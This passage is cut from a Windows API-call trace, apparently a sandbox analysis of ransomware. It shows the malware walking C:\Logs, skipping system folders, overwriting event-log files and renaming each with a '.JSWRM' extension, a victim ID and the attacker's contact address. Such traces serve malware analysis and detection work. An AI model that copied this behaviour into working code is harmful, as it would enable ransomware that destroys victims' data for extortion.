dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0066.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0066.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0066.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0066.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0066.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0066.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.501] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0066.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0066.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0066.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0066.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0066.502] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986efe1, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc986efe1, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Wcmsvc%4Operational.evtx", cAlternateFileName="MI72BF~1.EVT")) returned 1 [0066.502] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2=".") returned 1 [0066.502] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="..") returned 1 [0066.502] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="...") returned 1 [0066.502] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="windows") returned -1 [0066.502] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="recovery") returned -1 [0066.502] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="perflogs") returned -1 [0066.502] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.502] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.502] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="system volume information") returned -1 [0066.502] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="msocache") returned -1 [0066.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0066.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Wcmsvc%4Operational.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0066.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Wcmsvc%4Operational.evtx", cchWideChar=42, lpMultiByteStr=0x1f8638, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpUsedDefaultChar=0x0) returned 42 [0066.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0066.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0066.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Wcmsvc%4Operational.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0066.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Wcmsvc%4Operational.evtx", cchWideChar=42, lpMultiByteStr=0x1f87c0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpUsedDefaultChar=0x0) returned 42 [0066.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0066.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0066.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0066.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0066.502] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.503] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.503] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.503] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.701] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.701] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.701] CloseHandle (hObject=0x450) returned 1 [0066.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0066.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0066.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0066.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0066.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0066.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0066.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2173b0 [0066.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0066.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0066.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2173b0 | out: hHeap=0x1e0000) returned 1 [0066.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.704] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0066.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0066.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0066.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.705] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb426548, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb426548, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Defender%4Operational.evtx", cAlternateFileName="MI7501~1.EVT")) returned 1 [0066.705] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2=".") returned 1 [0066.705] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="..") returned 1 [0066.705] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="...") returned 1 [0066.705] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="windows") returned -1 [0066.705] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="recovery") returned -1 [0066.705] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="perflogs") returned -1 [0066.705] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.705] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.705] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="system volume information") returned -1 [0066.705] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="msocache") returned -1 [0066.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0066.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Defender%4Operational.evtx", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0066.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0066.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Defender%4Operational.evtx", cchWideChar=52, lpMultiByteStr=0x20e418, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Windows Defender%4Operational.evtx", lpUsedDefaultChar=0x0) returned 52 [0066.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0066.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0066.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Defender%4Operational.evtx", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0066.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0066.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Defender%4Operational.evtx", cchWideChar=52, lpMultiByteStr=0x20de78, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Windows Defender%4Operational.evtx", lpUsedDefaultChar=0x0) returned 52 [0066.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0066.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0066.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0066.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0066.706] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.706] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.706] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.706] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.712] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.712] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.713] CloseHandle (hObject=0x450) returned 1 [0066.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0066.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0066.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0066.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0066.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0066.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0066.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.715] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0066.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0066.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0066.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0066.716] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4729e7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb4729e7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Defender%4WHC.evtx", cAlternateFileName="MIF226~1.EVT")) returned 1 [0066.716] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2=".") returned 1 [0066.716] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="..") returned 1 [0066.716] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="...") returned 1 [0066.716] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="windows") returned -1 [0066.716] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="recovery") returned -1 [0066.716] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="perflogs") returned -1 [0066.716] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="documents and settings") returned 1 [0066.716] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.716] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="system volume information") returned -1 [0066.716] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="msocache") returned -1 [0066.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0066.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Defender%4WHC.evtx", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0066.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Defender%4WHC.evtx", cchWideChar=44, lpMultiByteStr=0x1f8328, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Windows Defender%4WHC.evtx", lpUsedDefaultChar=0x0) returned 44 [0066.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0066.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0066.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Defender%4WHC.evtx", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0066.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Defender%4WHC.evtx", cchWideChar=44, lpMultiByteStr=0x1f84e8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Windows Defender%4WHC.evtx", lpUsedDefaultChar=0x0) returned 44 [0066.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0066.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0066.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0066.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0066.716] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.717] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.717] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.717] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.723] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.723] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.723] CloseHandle (hObject=0x450) returned 1 [0066.725] 